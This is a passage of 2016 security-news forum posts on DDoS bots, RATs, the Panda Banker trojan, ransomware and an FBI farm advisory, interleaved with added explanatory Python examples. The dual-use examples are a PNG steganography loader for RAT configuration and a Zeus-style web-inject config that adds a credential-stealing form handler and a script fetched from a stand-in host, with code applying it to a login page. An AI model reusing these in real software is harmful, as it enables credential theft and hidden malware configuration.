The reason is that DDoS mitigation services use either cookies or JavaScript code to distinguish between actual users (browsers) and automated traffic, so adding these capabilities to DDoS bots allows them to circumvent some protection systems. Imperva says that, in most of the detected cases, the DDoS bots were masked as Chrome and Firefox using fake user agent strings.
For more details, Softpedia readers can check out Imperva's Global DDoS Threat Landscape Q1 2016.
source
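The cookie and JavaScript challenges discussed above, as an added example that is neither Imperva's code nor part of the original post: a signed challenge of the kind a mitigation layer issues, a client that "runs the JS" and stores the answer in a cookie, and the per-session rate limit a defender needs once a bot passes that first gate. It goes one step beyond the article by showing that second layer. The secret, the TTL, the threshold, the 203.0.113.x addresses and the traffic mix are all assumptions.

```python
"""Added example: a cookie/JS challenge like those DDoS mitigation services use, and why
a bot that can hold cookies and run JavaScript defeats it on its own.  Not Imperva's code;
challenge format, secret, thresholds and traffic are assumptions."""
import hashlib
import hmac
from collections import defaultdict, deque

SECRET = b"assumed-server-secret"   # assumption: per-deployment secret
CHALLENGE_TTL = 60                   # seconds a solved challenge stays valid (assumption)

def make_challenge(client_ip: str, now: float) -> dict:
    """Server side: the interstitial page embeds a nonce bound to the client IP and issue time.
    A real browser runs the page's JS, computes the answer, stores it in a cookie and retries."""
    issued = int(now)
    nonce = hmac.new(SECRET, f"{client_ip}:{issued}".encode(), hashlib.sha256).hexdigest()[:16]
    return {"nonce": nonce, "issued": issued}

def solve_challenge(challenge: dict) -> str:
    """Client side: stands in for the JS the browser (or a JS-capable bot) executes."""
    return hashlib.sha256(challenge["nonce"].encode()).hexdigest()

def verify_cookie(client_ip: str, cookie: dict, now: float) -> bool:
    """Recompute the nonce from ip + issue time (no server-side state) and check answer and TTL."""
    if now - cookie["issued"] > CHALLENGE_TTL:
        return False
    expected = make_challenge(client_ip, cookie["issued"])
    return hmac.compare_digest(solve_challenge(expected), cookie["answer"])

class RateLimiter:
    """Second layer: sliding window of request times per verified cookie, not per IP."""
    def __init__(self, max_requests: int, window: float):
        self.max, self.window = max_requests, window
        self.hits = defaultdict(deque)

    def allow(self, key: str, now: float) -> bool:
        q = self.hits[key]
        while q and now - q[0] > self.window:
            q.popleft()
        if len(q) >= self.max:
            return False
        q.append(now)
        return True

def handle_request(client_ip: str, cookie, limiter: RateLimiter, now: float) -> str:
    """'challenge' (no/invalid/stale cookie), 'blocked' (cookie fine, rate exceeded) or 'ok'."""
    if cookie is None or not verify_cookie(client_ip, cookie, now):
        return "challenge"
    if not limiter.allow(cookie["answer"], now):
        return "blocked"
    return "ok"

def simulate() -> dict:
    """Constructed traffic: a cookie-less bot, a JS-capable bot, a browser, and a replayed stale cookie."""
    limiter = RateLimiter(max_requests=20, window=1.0)
    t0 = 1_461_300_000.0
    out = {}
    # 1. Dumb bot: never stores the cookie, so every request dies at the challenge page.
    out["dumb_bot"] = handle_request("203.0.113.10", None, limiter, t0)
    # 2. JS-capable bot: solves the challenge once, then floods at 100 requests/second.
    ch = make_challenge("203.0.113.11", t0)
    bot_cookie = {"issued": ch["issued"], "answer": solve_challenge(ch)}
    results = [handle_request("203.0.113.11", bot_cookie, limiter, t0 + i * 0.01) for i in range(100)]
    out["smart_bot_ok"], out["smart_bot_blocked"] = results.count("ok"), results.count("blocked")
    # 3. Browser: same challenge flow, human-paced clicks two seconds apart.
    ch = make_challenge("203.0.113.12", t0)
    br_cookie = {"issued": ch["issued"], "answer": solve_challenge(ch)}
    out["browser"] = [handle_request("203.0.113.12", br_cookie, limiter, t0 + i * 2.0) for i in range(5)]
    # 4. Same cookie replayed after the TTL must fall back to the challenge.
    out["stale"] = handle_request("203.0.113.12", br_cookie, limiter, t0 + CHALLENGE_TTL + 1)
    return out
```

The point of the simulation is the second case: the challenge is a one-time cost for a bot that parses JavaScript, so the mitigation has to key its behavioural limits on the thing the bot earned (the solved cookie) rather than trust it.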

Poison Ivy RAT Receives Update Just in Time to Spy on Hong Kong Protesters
Posted by: baziroll - 04-22-2016, 10:26 PM - Forum: Security News - No Replies

A RAT (Remote Access Trojan) created at the start of the 2000s and then abandoned in 2008 has received a surprising update and is now being used to target pro-democracy organizations and supporters in Hong Kong.
Computer malware is never effective for more than one or two years, mainly due to the rapid evolution of the underlying operating systems. In terms of malware age, Poison Ivy (PIVY) is a very, very, very old tool.
Nevertheless, in its heyday, Poison Ivy was one of the criminal underground's top tools, used mainly because of its low antivirus detection rate and its simple GUI, which allowed even non-technical users to operate it without too many headaches.
"Eight years later, Poison Ivy receives an update"
On record, the last update Poison Ivy received was 2.3.2 in 2008. According to surprised researchers from Palo Alto's Unit 42 security forensics team, this RAT has recently received an update and has so far been deployed only in cyber-espionage campaigns against pro-democracy groups in Hong Kong, which have organized and participated in public protests for the past year.
According to the security firm, organizations and individuals involved in these pro-democracy movements have started to receive spear-phishing emails containing malicious Word files.
To lure victims into downloading and opening these files, they all carry titles that appeal to someone involved in freedom campaigns. The emails say the attachments contain information about recent events (March-April 2016), ranging from mandatory courses for school children to details about the Mong Kok riot and a wreath-laying event for the Tiananmen Square massacre.
"New Poison Ivy version uses DLL hijacking, code obfuscation"
If users open these documents, attackers leverage a vulnerability in Microsoft Office (CVE-2015-2545) to infect the target with the latest version of the Poison Ivy RAT, which Palo Alto has nicknamed SPIVY.
SPIVY then uses DLL hijacking to load its malicious code into running OS processes and opens a connection to its C&C servers, from which attackers send commands and steal data.
This tactic is not new, and Hong Kong pro-democracy organizations have been targeted before, along with other targets in Taiwan. In most attacks, the targets hold political views that differ from China's official policies, so someone could quickly jump to conclusions, even though researchers have declined to make official accusations.
source

Malware Coders Find the Perfect Technique to Help RATs Avoid Detection
Posted by: baziroll - 04-22-2016, 10:25 PM - Forum: Security News - No Replies

Security firm SentinelOne discovered a new technique leveraged by malware coders, who hide the most dangerous parts of RATs (Remote Access Trojans) in OS memory and use PNG files as configuration files.
Researchers first observed the technique in a series of state-sponsored attacks against Asian countries. The malware it was used with is NanoCore (also known as Nancrat), a RAT first detected in the spring of 2014.
For this campaign, the threat was distributed as an EXE file that, when executed, would extract a second EXE. Only the first EXE was stored on disk, and it contained no malicious behavior, while the second EXE was injected into system memory with the help of an encrypted DLL and a series of PNG files.
According to the SentinelOne team, because this second EXE never touched disk, classic antivirus solutions never picked up its malicious behavior. Only security products that scan OS memory would be able to pick up the second EXE.
If you're curious, the role of the PNG files is to store configuration data for the RAT's normal mode of operation. All the images are just a mess of random pixels, but when the second EXE reads their content, they reassemble into parts of the RAT payload and its configuration settings.
source
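How a loader recovers a configuration blob from a PNG whose pixels look like noise, as an added example that is neither SentinelOne's nor NanoCore's code: a minimal PNG writer and reader (chunks, CRCs, zlib-packed scanlines), a PRNG mask that makes the pixels "a mess of random pixels", and the byte-entropy check a defender can apply to images a process reads that no image viewer ever opens. The 4-byte length prefix, the XOR mask, the sample configuration and the key are assumptions; the real sample's framing is not in the article.

```python
"""Added example (not SentinelOne's or NanoCore's code): configuration hidden in the
pixel data of an 8-bit greyscale PNG, and an entropy heuristic for spotting such carriers.
Framing, mask and sample config are assumptions."""
import json
import math
import random
import struct
import zlib
from collections import Counter

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def _mask(data: bytes, key: bytes) -> bytes:
    """XOR with a seeded PRNG stream: enough to make pixels look like noise; not cryptography."""
    return bytes(a ^ b for a, b in zip(data, random.Random(key).randbytes(len(data))))

def _chunk(ctype: bytes, body: bytes) -> bytes:
    """PNG chunk layout: length, type, data, CRC32 over type+data."""
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))

def embed(payload: bytes, key: bytes, width: int = 64, min_height: int = 64) -> bytes:
    """Write [len][payload][zero pad] XOR mask as the pixels of a greyscale PNG."""
    framed = struct.pack(">I", len(payload)) + payload
    height = max(min_height, -(-len(framed) // width))
    pixels = _mask(framed + bytes(width * height - len(framed)), key)
    raw = b"".join(b"\x00" + pixels[r * width:(r + 1) * width] for r in range(height))  # filter 0 per row
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)  # 8-bit depth, colour type 0 (grey)
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")

def pixels_of(png: bytes) -> bytes:
    """Minimal PNG reader: validate chunk CRCs, inflate IDAT, strip the per-row filter byte."""
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos, width, height, idat = len(PNG_SIG), 0, 0, b""
    while pos + 12 <= len(png):
        (length,) = struct.unpack(">I", png[pos:pos + 4])
        ctype, body = png[pos + 4:pos + 8], png[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", png[pos + 8 + length:pos + 12 + length])
        if crc != zlib.crc32(ctype + body):
            raise ValueError(f"bad CRC in {ctype!r} chunk")
        if ctype == b"IHDR":
            width, height, depth, colour = struct.unpack(">IIBBBBB", body)[:4]
            if depth != 8 or colour != 0:
                raise ValueError("example only handles 8-bit greyscale")
        elif ctype == b"IDAT":
            idat += body
        elif ctype == b"IEND":
            break
        pos += 12 + length
    raw = zlib.decompress(idat)
    rows = []
    for r in range(height):
        row = raw[r * (width + 1):(r + 1) * (width + 1)]
        if row[0] != 0:
            raise ValueError("only filter type 0 (None) is handled here")
        rows.append(row[1:])
    return b"".join(rows)

def extract(png: bytes, key: bytes) -> bytes:
    """What the in-memory stage does: read pixels, strip the mask, honour the length prefix."""
    plain = _mask(pixels_of(png), key)
    (n,) = struct.unpack(">I", plain[:4])
    if n > len(plain) - 4:
        raise ValueError("length prefix exceeds pixel data: wrong key or not a carrier")
    return plain[4:4 + n]

def entropy_bits(data: bytes) -> float:
    """Shannon entropy per byte: text and real photos sit well below 7, masked pixels near 8."""
    total = len(data)
    return -sum(c / total * math.log2(c / total) for c in Counter(data).values())

# Constructed sample config, the kind of data a RAT keeps out of its on-disk dropper.
SAMPLE_CONFIG = json.dumps({"c2": ["198.51.100.23:4782"], "mutex": "example-mutex", "persist": True}).encode()
SAMPLE_KEY = b"assumed-per-sample-key"

def roundtrip() -> dict:
    png = embed(SAMPLE_CONFIG, SAMPLE_KEY)
    return {"recovered": extract(png, SAMPLE_KEY),
            "pixel_entropy": entropy_bits(pixels_of(png)),
            "config_entropy": entropy_bits(SAMPLE_CONFIG)}
```

The entropy figure is the practical takeaway: a real photograph compresses and has structure, so a "PNG" whose decoded pixels run close to 8 bits per byte and that is opened only by a process, never by a viewer, deserves a closer look.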

Meet Panda Banker, One of the Most Recent Zeus Banking Trojan's Offspring
Posted by: baziroll - 04-22-2016, 10:21 PM - Forum: Security News - No Replies

Malware analysts from Proofpoint and Fox IT InTELL have come across a new banking trojan, related to the old Zeus trojan, targeting banks in Australia and the UK.
Detected for the first time on March 10, this new banking trojan, named Panda Banker, spreads like all other banking trojans, via weaponized Word files.
These Word files either exploit vulnerabilities in Microsoft Office (CVE-2014-1761 and CVE-2012-0158) or rely on social engineering, trying to convince users to enable macro support in Word.
Once this happens and Panda Banker gets a foothold on the victim's PC, it gathers information about the local host and sends it to its C&C (command and control) server, which creates a fingerprint for the infected host so that it can distinguish it from other bots.
"Panda Banker only targets banks operating in the UK and Australia"
The information Panda Banker sends to its C&C server from each target includes the current username, installed antivirus and firewall solutions, OS version, computer name, local time, and more.
The server then responds with a configuration file in JSON format, containing a list of alternative C&C domains and a list of websites where the banking trojan should insert malicious code.
These latter websites are nothing more than banking portals. Proofpoint has seen the trojan targeting the clients of banks like Santander Bank, Lloyds Bank, Bank of Scotland, TSB, and Halifax UK.
"Panda Banker also distributed via exploit kits"
Its normal mode of operation resembles Zeus': it hijacks browser processes and injects malicious code into the Web pages of the aforementioned banking portals, stealing the user's login credentials.
Besides infecting users via Word files, Proofpoint has also seen the crooks employ three different exploit kits (Angler, Nuclear, and Neutrino) to deliver their trojan to unsuspecting victims. The strangest detail about this campaign is that the crooks used geo-location filters so only Australian and British users would be infected.
"Like many modern banking Trojans, Panda Banker appears to have roots in Zeus with sophisticated means of establishing persistence and uses in both targeted and widespread attacks," ProofPoint noted. "Banking Trojans like Zeus, Dyre, Tinba, and Dridex have netted cybercriminals billions of dollars by stealing banking credentials and, in many cases, generating fraudulent transactions."
source
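The bot-to-C&C exchange and the inject list described above, as an added example that is neither Proofpoint's nor the trojan's code: the host fingerprint the server derives from what the bot reports, a constructed JSON configuration in the shape the article describes (fallback C&C hosts plus inject targets), and how a Zeus-style web-inject rule is matched against a URL and applied to a page. The field names, the simplified Zeus-style marker semantics, the sample page and the addresses are assumptions; Panda's actual format is not in the article.

```python
"""Added example, not Proofpoint's or Panda Banker's code: host fingerprint, JSON config
with inject targets, URL matching and marker-based page modification.  Field names,
semantics and sample data are assumptions."""
import fnmatch
import hashlib
import json

def fingerprint(host: dict) -> str:
    """Server-side bot ID: a stable hash over the reported fields, so the same host is recognised again."""
    canon = json.dumps({k: host[k] for k in sorted(host)}, separators=(",", ":"))
    return hashlib.sha256(canon.encode()).hexdigest()[:16]

# Constructed config: what the C&C hands back once it has fingerprinted the bot.
SAMPLE_CONFIG = json.dumps({
    "c2": ["198.51.100.5", "203.0.113.77"],
    "injects": [
        {"url_mask": "https://online.example-bank.test/login*",
         "data_before": "<form id=\"login\"", "data_after": " action=",
         "data_inject": " onsubmit=\"return stealCreds(this)\""},
        {"url_mask": "https://*.example-bank.test/accounts/*",
         "data_before": "</form>", "data_after": "</body>",
         "data_inject": "<script src=\"https://203.0.113.77/x.js\"></script>"},
    ],
})

def matching_injects(config: dict, url: str) -> list:
    """Rules whose glob mask matches the URL the browser is loading."""
    return [r for r in config["injects"] if fnmatch.fnmatchcase(url, r["url_mask"])]

def apply_inject(page: str, rule: dict) -> str:
    """Simplified Zeus-style semantics: whatever lies between data_before and data_after is
    replaced by data_inject (pure insertion when data_after is empty); unchanged if markers are absent."""
    start = page.find(rule["data_before"])
    if start < 0:
        return page
    start += len(rule["data_before"])
    end = page.find(rule["data_after"], start) if rule["data_after"] else start
    if end < 0:
        return page
    return page[:start] + rule["data_inject"] + page[end:]

SAMPLE_PAGE = '<html><body><form id="login" action="/login" method="post"></form></body></html>'

def demo() -> dict:
    host = {"user": "jdoe", "av": "Example AV 10", "os": "6.1.7601", "host": "WS-042",
            "time": "2016-03-10T09:12:00"}          # constructed check-in, fields as the article lists them
    cfg = json.loads(SAMPLE_CONFIG)
    login_rules = matching_injects(cfg, "https://online.example-bank.test/login?lang=en")
    page = SAMPLE_PAGE
    for rule in login_rules:
        page = apply_inject(page, rule)
    return {
        "bot_id": fingerprint(host),
        "same_host_again": fingerprint(dict(host)) == fingerprint(host),
        "login_rule_count": len(login_rules),
        "accounts_rule_count": len(matching_injects(cfg, "https://online.example-bank.test/accounts/summary")),
        "unrelated_rule_count": len(matching_injects(cfg, "https://www.example-shop.test/")),
        "injected_page": page,
    }
```

For an analyst, the useful part is the matcher: once a configuration like this is recovered from memory or a C&C response, running each target URL through the masks tells you exactly which customers and which pages the operators were after.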

FBI Warns Farmers About the Dangers of Hackable IoT Farm Equipment
Posted by: baziroll - 04-22-2016, 10:19 PM - Forum: Security News - No Replies

Farmers who employ Internet-connected and precision farming equipment should be very mindful of the way they configure their devices, the FBI warned in a public advisory at the end of March.
The Bureau, together with the US Department of Agriculture (USDA), issued the note on March 31 as an alert about the growing IoT security threat.
The FBI is particularly warning against data breaches that may expose farming data saved with various companies or on cloud accounts.
“While precision agriculture technology (a.k.a. smart farming) reduces farming costs and increases crop yields, farmers need to be aware of and understand the associated cyber risks to their data and ensure that companies entrusted to manage their data, including digital management tool and application developers and cloud service providers, develop adequate cybersecurity and breach response plans.”
"Hacktivism may also play a part"
Additionally, the FBI is also sounding the alarm against hacktivists who might target farmers as a way of protesting against the US' agricultural policies.
An incident like this happened last fall, when an Anonymous hacker leaked data on USDA employees to protest against Monsanto, a multinational corporation operating in the agricultural sector.
Because farmers have taken advantage of recent technological breakthroughs and populated their farms with so-called "smart" equipment, they have also exposed themselves to hackers who may leverage the Internet connections this machinery now needs.
An improperly configured smart tractor can leak data about the farm's production and activity, data that may end up in a competitor's hands.
"FBI is trying to avoid the 'healthcare disaster'"
FBI and USDA officials claim they want to prevent a disastrous situation from repeating in the agricultural sector, similar to the one that occurred in the healthcare industry, which was caught unprepared for the arrival of the Internet of Things.
For this, the FBI has put forward a series of recommendations on which US farmers can build their cyber-security policies.
» Monitor employee logins that occur outside of normal business hours.
» Use two-factor authentication for employee logins, especially remote logins.
» Create a centralized Information Technology email account for employees to report suspicious emails.
» Provide regular training to remind and inform employees about current social engineering threats.
» Monitor unusual traffic, especially over non-standard ports.
» Monitor outgoing data, and be willing to block unknown IP addresses.
» Close unused ports.
» Utilize a Virtual Private Network (VPN) for remote login capability.
source
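The monitoring items in the FBI list above (logins outside normal hours, traffic on non-standard ports, outgoing data to unknown addresses that are candidates for blocking), as added example detection logic that is not part of the advisory or the original post, run over a few constructed log lines. The key=value log format, the business hours, the port allowlist, the "known destination" range (standing in for the equipment vendor's cloud) and the egress threshold are all assumptions.

```python
"""Added example (not from the FBI/USDA advisory): three of the listed recommendations as
rules over constructed login and flow records.  Format, hours, ports and ranges are assumptions."""
import ipaddress
from datetime import datetime

BUSINESS_HOURS = (7, 19)                                   # 07:00-19:00 local, weekdays (assumption)
STANDARD_PORTS = {22, 25, 53, 80, 123, 443, 587, 993}      # what this farm's systems legitimately use (assumption)
KNOWN_DESTS = [ipaddress.ip_network("198.51.100.0/24")]    # e.g. the equipment vendor's cloud (assumption)
EGRESS_BYTES_ALERT = 50_000_000                            # large-transfer threshold (assumption)

# Constructed records; in practice these come from VPN/RADIUS logs and NetFlow or firewall logs.
SAMPLE_LOG = """\
2016-04-12T08:15:02 type=login user=jdoe src=10.0.0.12 result=success
2016-04-12T02:41:17 type=login user=admin src=203.0.113.7 result=success
2016-04-12T02:43:05 type=login user=admin src=203.0.113.7 result=failure
2016-04-12T09:03:44 type=flow src=10.0.0.30 dst=198.51.100.40 dport=443 bytes=120400
2016-04-12T09:05:10 type=flow src=10.0.0.30 dst=192.0.2.99 dport=4444 bytes=2048
2016-04-12T23:30:00 type=flow src=10.0.0.31 dst=192.0.2.200 dport=443 bytes=812345678
2016-04-16T10:00:00 type=login user=jdoe src=10.0.0.12 result=success
"""

def parse(line: str) -> dict:
    ts, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["ts"] = datetime.fromisoformat(ts)
    return rec

def rule_after_hours_login(r: dict):
    """Successful logins on weekends or outside business hours (recommendation 1)."""
    if r["type"] == "login" and r["result"] == "success":
        h = r["ts"].hour
        if r["ts"].weekday() >= 5 or not (BUSINESS_HOURS[0] <= h < BUSINESS_HOURS[1]):
            return f"after-hours login by {r['user']} from {r['src']} at {r['ts']:%a %H:%M}"

def rule_nonstandard_port(r: dict):
    """Outbound flows to ports not on the allowlist (recommendation 5)."""
    if r["type"] == "flow" and int(r["dport"]) not in STANDARD_PORTS:
        return f"egress to {r['dst']}:{r['dport']} on a non-standard port"

def rule_unknown_destination(r: dict):
    """Outbound flows to addresses outside the known ranges; large ones first (recommendation 6)."""
    if r["type"] == "flow":
        dst = ipaddress.ip_address(r["dst"])
        if not any(dst in net for net in KNOWN_DESTS):
            size = int(r["bytes"])
            note = f"{size:,} bytes, above threshold" if size >= EGRESS_BYTES_ALERT else "small transfer"
            return f"egress to unknown destination {dst} ({note}); candidate for blocking"

RULES = [rule_after_hours_login, rule_nonstandard_port, rule_unknown_destination]

def scan(log: str) -> list:
    """Return (timestamp, rule name, message) for every record that trips a rule."""
    alerts = []
    for line in log.splitlines():
        if not line.strip():
            continue
        rec = parse(line)
        for rule in RULES:
            msg = rule(rec)
            if msg:
                alerts.append((rec["ts"].isoformat(), rule.__name__, msg))
    return alerts

def block_candidates(log: str) -> set:
    """Unknown destinations seen in the log, the list an operator would review before blocking."""
    return {a[2].split("unknown destination ")[1].split(" ")[0] for a in scan(log) if a[1] == "rule_unknown_destination"}
```

Note that the failed 02:43 admin login is deliberately not flagged on its own: the rule reports successful after-hours access, which is the case the advisory is worried about; failures belong to a separate brute-force rule.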

New CryptoBit Ransomware Could Be Decryptable
Posted by: baziroll - 04-22-2016, 10:17 PM - Forum: Security News - No Replies

PandaLabs, Panda Security’s anti-malware lab, detected a new type of ransomware that they think could be reverse engineered to allow users to recover their files.
Named CryptoBit, this particular ransomware variant infects users via exploits. First infections appeared at the start of April, and security researchers claim the ransomware is somewhat strange in its mode of operation.
After infection, CryptoBit will first and foremost scan for files that have particular extensions. By default, it will look for 96 different file types, searching for regular data storage files, such as images, file archives, databases, and office documents.
"CryptoBit uses AES+RSA encryption"
Once CryptoBit identifies all valuable files, it proceeds to encrypt them using the AES algorithm, which employs one key for both encryption and decryption.
The AES key itself is then encrypted with RSA, a dual-key model that uses different keys for encryption (public key) and decryption (private key). Researchers say the private key is most likely sent to a server under the ransomware author's control.
After the encryption process ends, CryptoBit will display a ransom note as the one below, telling the user their files were encrypted and that they must contact the ransomware's author via an email address or the Bitmessage network, using a special ID.
Compared to other ransomware families, CryptoBit is very greedy, asking for a whopping 2 Bitcoin (~$850). Most ransomware families these days only ask for 0.5 (~$215), maximum 1 Bitcoin (~$425).
"CryptoBit may have a flaw"
According to PandaLabs researchers, there might be a flaw in CryptoBit's armor.
"We notice[d] a specific detail: the absence of calls to the native libraries that encrypt files using the RSA algorithm," PandaLabs researchers say. "CryptoBit uses a series of statically compiled routines that allow you to operate with large numbers ('big numbers'), making it possible to reproduce the RSA encryption algorithm."
As it looks right now, it may be possible for security researchers to reverse-engineer the ransomware's custom RSA operations and recover the original AES encryption key.
Users should not confuse CryptoBit with another ransomware family called CryptorBit, which was very active during 2014.
source
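The AES+RSA hybrid scheme described above, as an added example that is neither PandaLabs' analysis nor CryptoBit's code: a fresh symmetric key per victim, that key wrapped under an RSA public key, and the decryption path showing exactly what a decryptor needs. Python's standard library has no AES, so an HMAC-SHA256 counter-mode keystream stands in for AES (a real decryptor would use AES-CTR or AES-GCM from a proper library). The RSA is textbook, unpadded big-integer arithmetic, the kind of operation a statically linked "big numbers" routine reproduces; the two Mersenne primes are fixed only so the demo is deterministic and are useless as a real key. Which specific weakness PandaLabs found is not in the article, and this example does not guess at it.

```python
"""Added example of the hybrid scheme the article describes; not PandaLabs' or CryptoBit's code.
HMAC-SHA256 counter keystream stands in for AES; RSA is textbook big-int arithmetic with fixed demo primes."""
import hashlib
import hmac
import secrets

# --- symmetric layer: one key for both directions, as the article says of AES ---
def _keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    out = bytearray()
    for ctr in range(-(-n // 32)):
        out += hmac.new(key, nonce + ctr.to_bytes(8, "big"), hashlib.sha256).digest()
    return bytes(out[:n])

def sym_encrypt(key: bytes, data: bytes) -> bytes:
    """nonce || data XOR keystream(key, nonce); stand-in for AES-CTR."""
    nonce = secrets.token_bytes(16)
    return nonce + bytes(a ^ b for a, b in zip(data, _keystream(key, nonce, len(data))))

def sym_decrypt(key: bytes, blob: bytes) -> bytes:
    nonce, body = blob[:16], blob[16:]
    return bytes(a ^ b for a, b in zip(body, _keystream(key, nonce, len(body))))

# --- asymmetric layer: public key seals the file key, only the private key opens it ---
def rsa_keygen(p: int, q: int, e: int = 65537):
    n, phi = p * q, (p - 1) * (q - 1)
    d = pow(e, -1, phi)          # modular inverse (Python 3.8+); requires gcd(e, phi) == 1
    return (n, e), (n, d)

def rsa_wrap(pub, key: bytes) -> int:
    """Textbook RSA: m^e mod n with no padding (real code must use OAEP)."""
    n, e = pub
    m = int.from_bytes(key, "big")
    if m >= n:
        raise ValueError("key does not fit under the modulus")
    return pow(m, e, n)

def rsa_unwrap(priv, c: int, key_len: int) -> bytes:
    n, d = priv
    return pow(c, d, n).to_bytes(key_len, "big")

def encrypt_file(pub, plaintext: bytes) -> tuple:
    """Per victim: a fresh 256-bit file key, wrapped with the public key; the wrapped key travels with the ransom ID."""
    file_key = secrets.token_bytes(32)
    return rsa_wrap(pub, file_key), sym_encrypt(file_key, plaintext)

def decrypt_file(priv, wrapped: int, blob: bytes) -> bytes:
    """The decryptor's path: unwrap the file key with d, then strip the symmetric layer."""
    return sym_decrypt(rsa_unwrap(priv, wrapped, 32), blob)

# Mersenne primes 2^127-1 and 2^521-1: valid for the arithmetic, deliberately not a real key.
DEMO_P, DEMO_Q = (1 << 127) - 1, (1 << 521) - 1

def roundtrip(plaintext: bytes = b"constructed sample document contents") -> dict:
    pub, priv = rsa_keygen(DEMO_P, DEMO_Q)
    wrapped, blob = encrypt_file(pub, plaintext)
    return {"recovered": decrypt_file(priv, wrapped, blob),
            "ciphertext_differs": blob[16:] != plaintext,
            "wrapped_below_modulus": wrapped < pub[0]}
```

The structure is what makes the PandaLabs remark interesting: everything a victim needs is the 32-byte file key, and that key is only reachable through the RSA private exponent. Whether a decryptor can be built therefore depends entirely on what the hand-rolled big-number routines do with that private half, which is the part the researchers say they can now reproduce and study.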

More apps and websites leak credit card data on enterprise handsets
Posted by: baziroll - 04-22-2016, 10:07 PM - Forum: Security News - No Replies

In its latest quarterly Mobile Data Report, Wandera has revealed a significant rise in apps leaking credit card data on enterprise mobile devices.
The company, which specializes in mobile data security and management, compiled the report by analyzing the data usage trends and traffic patterns across its global network of enterprise mobile devices. Between Q4 2015 and Q1 2016, there has been a 17 percent increase in apps and mobile websites leaking credit card data.
The CardCrypt security flaw discovered in December 2015 has played a large role in the amount of credit card data that has been leaked. The flaw affected 16 global companies' mobile websites and apps, which turned out to be transmitting users' credit card details and even the passport information of some users.
Wandera also noted that the number of malicious domains visited by users went up substantially in Q1 2016. There was a 200 percent increase per month during the quarter, which the company attributes to the ad frameworks used within apps and websites. The ads displayed often lead users to malicious domains against their will, and Wandera is advising all mobile users to think twice before tapping on any ad displayed within an app or their browser.
The company's report did notice a positive trend towards greater encryption within browsers and apps. Wandera's research shows that 70 percent of the data from apps is now encrypted, a 21 percent increase over the last 12 months. However, the encryption of data within browsers only increased by 13 percent, to a total of 52 percent.
Wandera was also able to identify the top 10 apps by data usage on enterprise devices during the last quarter. The majority of data is used by email and Safari at 34 percent, followed by Facebook at 10 percent, Instagram at three percent, Twitter at two percent, and WhatsApp Messenger, Spotify and Snapchat all at one percent.
Enterprise users have increasingly begun to use their devices for more than just work, and while this is good for app developers, it could mean an added security threat for their companies.
source